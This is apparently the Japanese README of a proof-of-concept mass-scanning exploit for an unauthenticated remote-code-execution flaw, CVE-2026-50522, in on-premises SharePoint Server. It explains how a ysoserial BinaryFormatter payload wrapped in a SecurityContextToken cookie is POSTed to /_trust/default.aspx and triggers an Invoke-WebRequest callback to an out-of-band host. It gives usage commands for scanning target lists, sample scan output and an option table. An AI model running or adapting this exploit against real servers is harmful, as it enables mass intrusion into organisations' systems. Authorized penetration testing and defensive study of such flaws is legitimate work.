
CVE-2026-50522 PoC
SharePoint Server の SecurityContextToken クッキーの逆シリアル化による未認証リモートコード実行
CVE-2026-50522 を対象としたマススキャンエクスプロイト。オンプレミスの Microsoft SharePoint Server を標的にします。/_trust/default.aspx WS-Federation エンドポイントにおける安全でない BinaryFormatter の逆シリアル化を悪用し、巧妙に細工された SecurityContextToken クッキーを介して未認証のコード実行を実現します。
注: このプロジェクトには、既知のペネトレーションテストツールである
ysoserialが含まれているため、ダウンロード中にウイルス対策ソフトが警告したり、隔離したりする可能性があります。
ysoserial.exe は TypeConfuseDelegate ガジェットを使用して BinaryFormatter シリアル化ペイロードを生成しますInvoke-WebRequest を実行してアウトオブバンドのコールバック URL にアクセスしますSecurityContextToken XML 構造内にラップされますRequestSecurityTokenResponse (WS-Federation) に埋め込まれますwresult パラメータが /_trust/default.aspx に POST されますrequests ライブラリpython CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
パスモード (デフォルト):
http://YOUR_ID.oastify.com/10.10.10.5
サブドメインモード:
http://10.10.10.5.YOUR_ID.oastify.com
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]
[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed
| 引数 | 説明 | デフォルト |
|---|
-t, --target | 単一ターゲットの URL | - |
-T, --targets | ターゲット URL を1行に1つずつ記述したファイル | - |
-c, --callback-url | OOB コールバックのベース URL (必須) | - |
--callback-mode | path または subdomain | path |
--ysoserial | ysoserial.exe へのパス | ysoserial.exe |
-x, --proxy | HTTP プロキシ | なし |